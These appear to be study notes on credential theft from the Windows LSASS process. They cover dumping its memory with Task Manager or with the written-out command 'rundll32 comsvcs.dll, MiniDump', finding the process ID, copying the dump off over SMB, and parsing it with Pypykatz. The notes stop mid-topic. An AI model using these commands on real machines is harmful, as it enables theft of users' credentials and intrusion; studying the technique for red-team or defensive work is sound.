Attacking LSASS

• Upon initial logon, LSASS will:

  • Cache credentials locally in memory

  • Create access tokens

  • Enforce security policies

  • Write to Windows security log

Dumping LSASS Process Memory

Task Manager Method

• A file called lsass.DMP is created and saved in:

C:\Users\loggedonusersdirectory\AppData\Local\Temp

• to copy files use

  • Create SMB server Linux (HACK)

Rundll32.exe & Comsvcs.dll Method

• modern anti-virus tools recognize this method as malicious activity.

• Before issuing the command to create the dump file, we must determine what process ID (PID) is assigned to lsass.exe.

• This can be done from cmd or PowerShell:

Finding LSASS PID in cmd

tasklist /svc

Finding LSASS PID in PowerShell

Get-Process lsass

Creating lsass.dmp using PowerShell

rundll32 C:\windows\system32\comsvcs.dll, MiniDump 672 C:\lsass.dmp full

• to copy files use

  • Create SMB server Linux (HACK)

Using Pypykatz to Extract Credentials

• Pypykatz